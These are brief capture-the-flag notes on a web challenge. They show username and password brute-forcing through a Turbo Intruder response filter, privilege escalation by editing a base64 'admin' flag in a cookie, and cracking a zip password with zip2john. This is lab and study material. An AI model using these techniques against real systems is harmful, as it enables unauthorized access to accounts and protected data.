![d39c520fe61945ec6ed741900fe89baf.png](aec217734c424b8ba55a1bcba609e5c4.png)
![df97b3eae7b89c51e3de509d8cb3d389.png](44a8c18e63964850a99f665762dd088f.png)
kicks back `invalid username` as the error which makes me think we can brute the username and then maybe it'll kick back invalid password once we have the username
![fdd90f8ddb8d6714a3f604d1cd722cf4.png](5cd30bfc12e94e20840a2a542a437885.png)
![0c901fa59a1f0186ffcdf6a9d62e13da.png](72f48cc575c54a1d8e06637063e4303f.png)
Turbo intruder pertinent script excerpt:
```
def handleResponse(req, interesting):
# currently available attributes are req.status, req.wordcount, req.length and req.response
if 'Invalid Password' in req.response:
table.add(req)
```
Now going to do the same for the password
```
if 'Invalid Password' not in req.response:
```
![b9cf140322b5022fafa693e54ee884a1.png](6ca5ffd273664d11b4e2e8b8a6e61adc.png)
cookie is
`eyJjb29raWUiOiIxYjVlNWYyYzlkNThhMzBhZjRlMTZhNzFhNDVkMDE3MiIsImFkbWluIjpmYWxzZX0=`
which is
`{"cookie":"1b5e5f2c9d58a30af4e16a71a45d0172","admin":false}`
changing the `admin` value to `true` and changing the cookie gives us
![6bd0c241ff39beb30744742192dc376f.png](2d119097933e47daa89e2c45511bb2f5.png)
The zip file has a password
`zip2john file.zip > forjohn`
![841697307ea838d95300bd9b4185da8c.png](c369ddc6a288493da2956f5745715da9.png)
![8300f0a5bbc624268b8fb036b19894c6.png](05afe257acae4f088534811837aa50d1.png)
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #bruteforce #password_cracking #johntheripper #web
Related: